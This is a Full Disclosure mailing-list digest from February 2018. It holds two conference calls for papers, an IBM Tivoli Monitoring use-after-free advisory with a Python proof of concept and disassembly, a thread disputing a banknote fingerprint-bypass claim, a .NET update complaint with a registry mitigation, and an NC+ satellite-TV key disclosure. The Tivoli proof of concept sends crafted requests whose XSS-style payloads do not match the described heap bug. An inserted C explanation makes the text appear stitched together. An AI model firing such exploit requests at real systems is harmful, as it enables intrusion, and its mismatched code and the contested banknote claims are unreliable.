[FD] EuskalHack Security Congress Call For Papers

2018-02-06 Thread Joxean Koret
] EuskalHack Security Congress III Call For Papers [

Introduction


EuskalHack Security Congress Third Edition is a new proposal from the
EuskalHack Computer Security Association, with the aim of promoting
community growth and culture in the digital security field. As
usual, in this new edition proximity to our public and technical
quality will be our hallmarks.

This exclusive conference is shaping up as the most relevant in the
Basque Country, with an estimated 180 attendees for this third edition.

The participants include specialized companies, state security
organizations, professionals, hobbyists and students in the area of
security and Information Technology.


Date and location
-----------------

The date for the conference is the 22nd and 23rd of June 2018 in the
lovely city of Donostia – San Sebastian.


Take part as a speaker
----------------------

We want to open the doors to all those who wish to be part of this
third edition of the EuskalHack Security Congress in one of the various
categories of talks and workshops we offer.

We are looking for small workshops or talks related to digital
security, information security or tech in general, such as:

 - Reverse engineering.
 - Robotics, Drones, Consoles, Hardware Hacking, Gadgets, mobile
environments...
 - Critical infrastructure security, industrial environments, Smart
City, financial...
 - Cloud insecurity, virtualization, containers, Hardening, cloud
forensics...
 - GSM signal hacking, SDR, LTE, 3G, Satellite links, VoIP...
 - Cryptography, steganography, forensics techniques and
countermeasures...
 - Data mining, Neural networks, statistical modeling...
 - Malware, APT, Sandboxing, Sandbox escapes, Bypassing “things”...
 - Corporate security and intelligence, OPSEC, OSINT...
 - Web Hacking, SQL and NoSQL injection, LDAP injection, Hacking with
search engines...
 - Hacktivism, net neutrality, Deep web, darknet, cryptocurrencies...

All proposals will be valued according to their originality, educational
value, contribution to the community, and their capacity to make our
audience have a good time.

Highest priority will be given to those proposals that have not been
previously exhibited at another event. Please don't forget to indicate
it when making your submission.


Language and internationalization
---------------------------------

At EuskalHack we value linguistic diversity and internationalization;
this is why we accept talks in Spanish, Basque or English. Just let us
know what language you plan to use for your slides and for the talk. 

Note: We positively value bilingual options which can be understood by
as many attendees as possible, for example, slides in one language
while speaking in another.


Talks and Workshops
-------------------

We will have several spaces over the course of the event, which will
include talks and workshops concurrently, taking two different
approaches:


 * Standard talks: 50 minutes duration
 * Specific workshops: 120 minutes duration

Once all the proposals have been received, the total number of
presentations of each type will be determined, considering aspects such
as technological diversity and the audience.


Proposals
---------

Proposal submissions should be sent before March 19th through the forms
found on the following links:

ENGLISH: https://goo.gl/nM9pKa
EUSKERA: https://goo.gl/qdB2mS
SPANISH: https://goo.gl/NkABaf


Dates to consider
-----------------

The following are the dates and milestones which should be considered
during various phases by the speakers directly involved:

17/01/18 - Speaker registration begins
19/03/18 - Speaker registration ends
04/04/18 - Speaker confirmation date deadline by the organisation
01/05/18 - Speaker requirements submission
31/05/18 - Follow-up communication
21/06/18 - Speakers reception
22/06/18 - EuskalHack Security Congress

Commitment to meeting the dates set by those involved is requested, for
the paper planning and effective implementation of the congress.


Speaker rights and privileges
-----------------------------

 * Take part in the reference security congress in Basque Country.
 * Round trip paid by the organization (conditions to be agreed *).
 * Accommodation paid in a hotel near the congress, in the beautiful
city of Donostia - San Sebastian (Double room).
 * Complete access to the conference with a companion.
 * Dinners with the other speakers and conference organizers.
 * 40% off on the EuskalHack association fee for the first year.


Disclaimer
----------

 * The talks and workshops not exhibited previously at other security
congresses or media will be considered a priority.
 * Compliance with obligations and regulations by all concerned parties
is vital to avoid any setbacks for the speaker and the congress.
 * The duration of the talks must stick to the terms of the agreement,
allowing the audience to have time for the round of questions.
 * The talks and workshops mus

[FD] CFP for Packet Hacking Village Talks at DEF CON 26

2018-02-06 Thread Ming
OVERVIEW

The Wall of Sheep would like to announce a call for presentations at
DEF CON 26 at the Caesars Palace in Las Vegas, NV from Thursday,
August 9th to Sunday, August 12th. Speaker Workshops has been renamed
Packet Hacking Village Talks as we now offer hands-on
workshops. The goal of Packet Hacking Village Talks is to deliver talks that
increase security awareness and provide skills that can be immediately
applied after the conference. Our audience ranges from those who are
new to security to the most seasoned practitioners in the security
industry. Introductory talks are welcome.

Topics of interest include:

* Tools on network sniffing, intrusion detection, monitoring,
  forensics

* How to find and evict people harvesting cryptocurrency on your
  devices

* How to refresh your PC without losing all your stuff and
  eliminate the malware

* Incident response recovery

* Justifying hacking / security tools in the corporate world

* Finding rootkits and malware

* General Digital Forensics and Incident Response (DFIR) talks

* How to use regulatory compliance requirements in your favor to
  enhance your overall funding and security posture

* Security awareness program success and failure stories

* Enterprise defense using open source tools (e.g., Yara, Cuckoo
  Sandbox)

* Tool / task automation and optimization

* New and innovative ways of using old tools

* Incident response process and procedures

* Tools for data collection and visualization

* Purple teaming

The Wall of Sheep will not accept product or vendor related
pitches. If your talk is a thinly-veiled advertisement for a product
or service your company is offering, please do not apply!

All accepted talks will be announced, recorded, and published by Aries
Security, LLC. and DEF CON Communications, Inc. Please see our YouTube
channel for all talks from previous years:
https://www.youtube.com/channel/UCnL9S5Wv_dNvO381slSA06w.

The Call for Presentations will close on Thursday, June 15th at 11:59
PM. The list of talks will be finalized and published on Friday, June
30th.

SPEAKING FORMAT

Each presentation slot is 1 hour maximum, including time for Q&A. If
we have time and it is in line with our goals mentioned above, then
there is a good chance you will be selected.

To submit a presentation, please provide the following information in
the form below to cfp2018[at]wallofsheep[dot]com

Primary Speaker Name:

Primary Speaker Title and Company (if applicable):

Primary Speaker Email Address:

Primary Speaker Phone Number (to contact you if necessary during the
conference):

Primary Speaker Twitter name (if you want it known if you are
accepted):

Primary Speaker Facebook page (if you want it known if you are
accepted):

Additional Speakers' name(s), titles, and social information:

Additional Email Addresses:

Is there a specific day or time you MUST speak by?

Name of Presentation:

Length of presentation: (20 minutes or 50 minutes)

Abstract:

Your abstract will be used for the website and printed
materials. Summarize what your presentation will cover. Attendees will
read this to get an idea of what they should know before your
presentation, and what they will learn after. Use this to inform about
how technical your talk is. This abstract is the primary way people
will be drawn to your session. CFP reviews like to see what tools will
be used and what materials you suggest to read in advance to get the
most out of your presentation.

Equipment Needs & Special Requests:

The Wall of Sheep will provide 1 projector feed, and microphones. If
you need to use multiple outputs for a demo, please mention this
below.

Speaker's Bio(s):

This text will be used for the website and printed materials and
should be written in the third person. Cover any professional history
that is relevant to the presentation, including past jobs, tools that
you have written, etc. Let people know who you are and why you are
qualified to speak on your topic. Presentations that are submitted
without biographies will not be considered.

Detailed Outline:

You must provide a detailed outline containing the main points and
navigation through your talk. Show how you intend to begin, where you
intend to lead the audience and how you plan to get there. The outline
may be provided in a separate attachment and may be as simple as a
text file or as detailed as a "bare bones" presentation. The better
your outline, the better we are able to review your
presentation against other submissions (and the higher chance you have
of being accepted). SUBMISSION NOTE: Presentations that are submitted
without abstracts, outlines, or speaker bios (e.g., that have only
PDFs, PPTs, or white papers attached or only point to a URL) will not
be considered.

Supporting File(s):

Additional supporting materials such as code, white papers, proof of
concept, etc. should be sent along with this email to
cfp2018[at]wallofsheep[dot]com. Note that additional files that may
help in the selection proce

[FD] IBM Tivoli Monitoring CVE-2017-1635 Remote Code Execution Vulnerability

2018-02-06 Thread p
IBM Tivoli Monitoring CVE-2017-1635 Remote Code Execution Vulnerability

CVEID: CVE-2017-1635
CVSS Base Score: 8
Affected Products and Versions
The KDH component of IBM Tivoli Monitoring Basic Services (KGL,KAX) for
Version 6.2.2 through 6.2.2 Fix Pack 9


A vulnerability exists in the internal web server provided by IBM Tivoli
Monitoring basic services. It could allow a remote attacker to execute
arbitrary code on the system, caused by a use-after-free error. A remote
attacker could exploit this vulnerability to execute arbitrary code on
the system or cause the application to crash.
The web server component "KDH", after receiving certain requests,
executes a memory region in the heap previously freed by the component
itself.
An attacker is able to fill the heap before the memory is reused, in
order to execute arbitrary code.

poc.py


import socket

# Connect to the KDH internal web server (port 1920 on localhost in the PoC)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 1920))

# First crafted request from the advisory (sent as raw bytes, Python 3)
payload = b'GET /index.php?action=storenew&username=alert()index.php?action=storenew&username=alert() HTTP/1.1\r\n\r\n'
s.send(payload)

# Second crafted request; whatever the server returns is printed
payload = b'GET /index.php?action=search&searchFor=\">alert() HTTP/1.1\r\n\r\n'
s.send(payload)
print(s.recv(1024))


0x6191BCF8 - malloc in BSS1_NewFormat
0x61903fea - free in BSS1_EndFormat
0x6191BDEF - call to ecx+4

At first, malloc() is called to allocate space (0x400) where application
will put response page to the faulty request; then free() is called on
the same address used in the “call [ecx+4]” later on.

The disassembly code involved is:

kbb.dll:61903FD7 mov eax, [edx]
kbb.dll:61903FD9 push eax
kbb.dll:61903FDA mov ecx, [ebp-8]
kbb.dll:61903FDD call dword ptr [ecx+4]   <- here the address stored at
(previously freed heap + 4) is called

Supporting technical details:
As shown in the WinDbg screenshot
(http://www.quantumleap.it/wp-content/uploads/2018/02/tivoli_windbg.jpeg),
execution is suspended at 0x004c0931, where the payload is “\xcc” -
breakpoint.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
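
The use-after-free pattern described in the advisory above (allocate a
0x400-byte response object, free it, then call through the function
pointer at offset 4 of the freed object), as an added C illustration that
is not IBM's code: the object layout, the one-slot arena, the poison value
and every function name are assumptions made for the example. It shows
the buggy release-before-dispatch ordering beside the fixed ordering.

```c
#include <stdint.h>
#include <string.h>

/* Added illustration of the bug class in the advisory above; not IBM's code,
 * and every name is assumed. A 0x400-byte response object is created (malloc
 * in BSS1_NewFormat), released (free in BSS1_EndFormat) and only then
 * dispatched through a function pointer read from the released memory (the
 * "call [ecx+4]"). A one-slot arena replaces the heap so the stale read is
 * defined behaviour here and can be checked instead of crashing. */

#define RESP_SIZE 0x400
#define POISON    0xAA            /* debug-heap style fill applied on free */

struct resp;
typedef int (*resp_fn)(struct resp *);
struct resp_ops {                 /* table reached through [ecx]           */
    resp_fn write;                /* offset 0                              */
    resp_fn finish;               /* offset 4 on 32-bit: the [ecx+4] slot  */
};
struct resp {
    const struct resp_ops *ops;   /* first field of the object             */
    size_t len;
    char body[RESP_SIZE - sizeof(void *) - sizeof(size_t)];
};

static union { unsigned char bytes[RESP_SIZE]; struct resp obj; } arena;
static int arena_in_use;

static void *arena_alloc(size_t n) {
    if (arena_in_use || n > RESP_SIZE) return NULL;
    arena_in_use = 1;
    memset(arena.bytes, 0, RESP_SIZE);
    return &arena.obj;
}
static void arena_free(void *p) {
    if (p != &arena.obj) return;
    memset(arena.bytes, POISON, RESP_SIZE);   /* poison, do not reuse yet */
    arena_in_use = 0;
}

static int resp_write(struct resp *r)  { return (int)r->len; }
static int resp_finish(struct resp *r) { return (int)r->len + 1; }
static const struct resp_ops page_ops = { resp_write, resp_finish };

static struct resp *new_format(const char *page) {     /* cf. BSS1_NewFormat */
    struct resp *r = arena_alloc(sizeof *r);
    if (!r) return NULL;
    r->ops = &page_ops;
    r->len = strlen(page) < sizeof r->body ? strlen(page) : sizeof r->body - 1;
    memcpy(r->body, page, r->len);
    return r;
}
static void end_format(struct resp **pr) {             /* cf. BSS1_EndFormat */
    arena_free(*pr);
    *pr = NULL;               /* half of the fix: no stale copy left in *pr */
}

/* Buggy ordering: the object is released before the final dispatch, so the
 * ops pointer that would feed "call [ecx+4]" is read from freed memory.
 * Returns that pointer value rather than calling through it. */
static uintptr_t vulnerable_ops_after_free(const char *page) {
    struct resp *r = new_format(page), *dangling = r;  /* stale copy ([ebp-8]) */
    if (!r) return 0;
    r->ops->write(r);
    end_format(&r);
    return (uintptr_t)dangling->ops;
}

/* Fixed ordering: both callbacks run while the object is live; it is
 * released (and the pointer nulled) only afterwards. */
static int handle_request_fixed(const char *page) {
    struct resp *r = new_format(page);
    if (!r) return -1;
    r->ops->write(r);
    int rc = r->ops->finish(r);
    end_format(&r);
    return rc;
}
```

With a real allocator the poisoned pointer would instead be whatever the next allocation of that size wrote there, which is why the advisory describes filling the heap before the memory is reused.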

Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-06 Thread InterN0T via Fulldisclosure
Exactly how many people are using these banknotes for "fake fingerprints" with 
their phone?

The reason why you use your own fingerprint, and not a standardized hologram 
fingerprint from a Euro bank note, is so that only your fingerprint can unlock 
your phone for example.

This whole advisory seems like one big troll.


For example this:
--
5. [Truncated] An agent could for example save data variables in the biometric 
sign of the banknote to exfiltrate information.

Note: Yeah they could also embed secret information anywhere else in the bank 
note, for example the micro-text, UV text, or probably even INSIDE the bank 
note.
--

A lot of fingerprint readers are pretty bad and imperfect by design too.

Mythbusters Fingerprint Bypass:
https://www.youtube.com/watch?v=3Hji3kp_i9k
Note: Look at the end where they used a photocopy on a piece of paper to bypass 
that particular lock.

German Fingerprint Hack:
https://www.theguardian.com/technology/2014/dec/30/hacker-fakes-german-ministers-fingerprints-using-photos-of-her-hands

Master Fingerprints Hack:
https://www.express.co.uk/life-style/science-technology/791055/smartphone-fingerprint-scanner-hacked-criminals-scan-data
Hot Glue Fingerprint Mold:
https://www.youtube.com/watch?v=kinq5nzY37c

General flaws about fingerprints:
https://globalnews.ca/news/3371112/smartphone-fingerprint-sensors-hack/

 Original Message 
 On February 2, 2018 7:56 PM, Ben Tasker  wrote:

>There's some detail in the Vulnerability magazine link, reproducing here so
> there's a record
>
> We discovered an anomaly in the hologram section of the new printed 20€ &
> 50€ banknotes. The security sign on the banknotes are produced with a
> transparent film. In the middle of the new hologram of the 20 & 50€
> banknotes is a picture of a women and different fingerprint-like
> structures. At the moment we noted the problem, we used a microscope to
> look closer.
>
> After an internal discussion, that the security sign could maybe used for
> biometrics authentication processes, we tested the hologram for usage on
> different fingerprinter-scanners like asus pro laptop, eikon, samsung
> galaxy S7/8 and the apple iphone v11. All mechanisms could be bypassed
> using the hologram of the banknotes to fake a fingerprint which is accepted
> by the fingerprint-scanner system. After that, the attacker is able to
> relogin with the universal hologram.
>
> Finally, we were able to bypass the biometric identification process of
> the different devices. No system is able to identify, that the hologram is
> not a real fingerprint. At the end, we figured out in the testing process
> that the holograms can be used to add via write and auth via read. There
> are now multiple problems in connection to the security issue.
>1. Fingerprint - Reader & Writer (Mobile Devices)
>
> The end user devices like phones with fingerprinter sensors of
> manufacturers like samsung, apple, huawei & co are permanently vulnerable
> to this new type of attack. The sensor does not approve the reflection of
> the hologram in the read and write mode. It interprets the security signs
> as features of a real fingerprint. Thus results in an easy bypass using any
> 20€ or 50€ banknotes after registration. To use an attacker only requires
> to use his finger behind the hologram to bypass the fingerpulse check of
> the idevice. All other mechanism are not accurate approving the content
> during the sensor check.
>
>
>2. Biometric Security in Europe
> Each time the EZB produces more of the affected banknotes, the biometric
> security in all over europe countries is generally weakened. In the near
> future the EZB plans to integrate the holograms to any banknote (5€, 10€,
> 100€ & Co.). This would be a crazy incident for all biometric systems using
> a fingertip to authenticate because of any person is by now able to perform
> those type of attacks against an environment or service.
>
>
>3. Fake fingerprints to go
> Any person that has access to a system could use a hologram of a european
> banknote to fake his fingerprint. Even the once which do not have the
> expertise to fake it because in case of a publication, the government would
> have to reckon with it.
>
>
>4. Universal fingerprint as key
> One time a hologram is written to a database, any attacker could use
> another hologram of the same banknote series to bypass the security
> mechanism to finally get access to the environment. Also administrators or
> moderators are able to setup a universal fingerprint key to any dbms for
> further entrance.
>
>
>5. Save content in biometric signs or read data
> The problematic could be used by security agencies to save data in the
> biometric sign or to use them to get access to protected environments. An
> agent could for example save data variables in the biometric sign of the
> banknote to exfiltrate information.
>
>
>6. Information in the hologram
> In the special case of a fingerprint entry is generated by mathematical
>

[FD] Defense in depth -- the Microsoft way (part 50); Windows Update shoves unsafe crap as "important" updates to unsuspecting users

2018-02-06 Thread Stefan Kanthak
Hi @ll,

on all but their latest versions of Windows (which Microsoft ships
with .NET Framework 4.x), Microsoft shoves COMPLETELY NEW versions
of .NET Framework via Windows/Automatic Updates onto the PERSONAL
computers of their unsuspecting users^Wcustomers, even and especially
when those customers^Wpoor victims have NOT A SINGLE application
installed which needs .NET Framework at all, and installs them
without asking or even informing their customers, SILENTLY!

Trustworthy computing? NOPE!

In detail:

* Users of Windows 2000 got .NET Framework 1.1, then 2.0 and 3.0
  shoved onto their computers, SILENTLY!

JFTR: .NET Framework 2.0 is NOT an update to .NET Framework 1.x,
  but a COMPLETELY new and incompatible version, which gets
  installed aside a previous version.

* Users of Windows XP got and users of Windows Embedded POSReady 2009
  still get .NET Framework 2.0, then 3.0, 3.5, 3.5.1 and 4.0 shoved
  onto computers, SILENTLY!

JFTR: neither Windows 2000 nor Windows XP shipped with any version
  of .NET Framework.
  Especially with these versions of Windows, pushing
  .NET Framework as "Update" is a euphemism.

JFTR: .NET Framework 4.x is NOT an update to any prior version of
  .NET Framework, but a COMPLETELY new and incompatible version,
  which gets installed aside previous versions.
  At least Microsoft continued to use the euphemism "Update".

* Users of Windows Server 2003 and Windows Server 2003 R2 got
  .NET Framework 2.0, then 3.0, 3.5, 3.5.1 and 4.0 shoved onto
  computers, SILENTLY!

JFTR: Windows Server 2003 shipped with .NET Framework 1.1, and
  Windows Server 2003 R2 with both .NET Framework 1.1 and 2.0.

* Users of Windows Vista got, and users of Windows Server 2008
  still get .NET Framework 3.5, 4.0, 4.0.1, 4.5, 4.5.1, 4.5.2 and
  4.6 shoved onto computers, SILENTLY!

JFTR: both versions of Windows shipped with .NET Framework 3.0,
  for which 3.5 may be considered an update.

* Users of Windows 7 as well as users of Windows Server 2008 R2
  still get .NET Framework 4.0, 4.0.1, 4.5, 4.5.1, 4.5.2, 4.6,
  4.6.1, 4.6.1, 4.7 and 4.7.1 shoved onto computers, SILENTLY!

JFTR: both versions of Windows shipped with .NET Framework 3.5.1.


Every installed version of .NET Framework enlarges the attack
surface of Windows, SIGNIFICANTLY, and contains multiple known
vulnerabilities Microsoft WON'T FIX, for example:

* the (update) installers of EVERY version of .NET are vulnerable
  to DLL hijacking and allow to perform escalation of privilege:
  see 

* all versions of .NET Framework are vulnerable to DLL hijacking
  and allow a trivial-to-perform escalation of privilege: see
  


Mitigation:
~~~

To block WU/AU from shoving .NET Framework 4.x SILENTLY to your
computer, see the MSKB articles
,
,
,
,
 and
: then create the
following *.REG and import it.

--- *.REG ---
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\WU]
"BlockNetFramework4"=dword:0001
"BlockNetFramework45"=dword:0001
"BlockNetFramework451"=dword:0001
"BlockNetFramework452"=dword:0001
"BlockNetFramework46"=dword:0001
"BlockNetFramework461"=dword:0001
"BlockNetFramework462"=dword:0001
"BlockNetFramework47"=dword:0001
"BlockNetFramework471"=dword:0001
--- EOF ---

To block earlier versions, see the MSKB articles
,
 and
.


stay tuned
Stefan Kanthak


PS: Microsoft implemented .NET Framework in Windows NT in a
TOTALLY flawed and wrong way: if done right, it would be an
NT subsystem, like the "Subsystem for OS/2", the POSIX
subsystem, the "Subsystem for UNIX Applications", the
"Windows Subsystem for Linux" or Windows itself.



[FD] [SE-2011-01] A security issue with a Multiroom service of NC+ SAT TV platform

2018-02-06 Thread Security Explorations


Hello All,

A couple of weeks ago, Platform NC+ [1], one of the major digital SAT
TV providers in Poland issued an official message [2] to subscribers
about the policy of content security. Among other things, the following
statements were included in it:

"Platform nc+ as a technology leader in the market and an operator with
a rich program offer conducts many activities aimed at providing a high
security of the offered content".

"In order to fulfill the requirements of content providers, platform nc+
is obliged to completely secure the Multiroom service".

We decided to have a look underneath the implementation of the security
of Multiroom service and found out that the above claims hardly reflect
the reality.

More specifically we discovered that a shared AES key used to secure the
Multiroom service of NC+ operator can be discovered. This is due to the
following:
1) MPEG broadcast stream containing SSU image for certain NC+ devices is
   not encrypted (software upgrade image can be downloaded regardless of
   the presence of a Conax card in the STB device - there is no need to
   decrypt MPEG stream with the use of Control Words).
2) software upgrade image for ITI-5800S Multiroom client device, although
   encrypted, can be easily decrypted (in 2012, we published information
   about plaintext SW upgrade keys being broadcast along with the upgrade
   image [3][4]; this issue hasn't been addressed),
3) ITI-5800s upgrade file embeds Compressed ROMFS image containing root
   filesystem for ITI-5800S device, this image can be extracted under
   Linux OS,
4) the binary of a main STB application embeds a custom Java File System
   (ROMFS), which can be also successfully extracted / unpacked,
5) ROMFS filesystem contains obfuscated Java classes of which one includes
   a hardcoded initialization vector and AES key used to secure Multiroom
   service of NC+ operator (this key is used to encrypt / decrypt a file
   carrying authorization data for a client device).

The full report, along with Proof of Concept code illustrating our findings,
can be downloaded from the following locations:

http://www.security-explorations.com/materials/se-2011-01-33.pdf
http://www.security-explorations.com/materials/se-2011-01-33.zip

We usually follow our Disclosure Policy [5] (modified recently to reflect
SRP research [6]) when it comes to reporting and disclosing vulnerabilities.
We do not when experiencing issues like that [7]:

"Vendors not responding to our email messages for 7+ days:
- Advanced Digital Broadcast (set-top-box vendor)
  awaiting response to the message from 11-Jan-2012
- ITI Neovision (SAT TV operator)
  awaiting response to the message from 01-Feb-2012".

Thank you.

--
Best Regards,
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
"We bring security research to a new level"
-

References:
[1] NC+ Platform
http://ncplus.pl/
[2] Polityka Zabezpieczenia Treści
http://ncplus.pl/zabezpieczenie-tresci
[3] SE-2011-01 Issues #5-16,#25-32 (Advanced Digital Broadcast),
http://www.security-explorations.com/materials/se-2011-01-adb.pdf
[4] "Security threats in the world of digital satellite television"
http://www.security-explorations.com/materials/se-2011-01-hitb1.pdf
[5] Security Explorations - Disclosure Policy
http://www.security-explorations.com/en/disclosure-policy.html
[6] Security Research Program
http://www.security-explorations.com/en/srp.html
[7] SE-2011-01 Vendors status
http://www.security-explorations.com/en/SE-2011-01-status.html

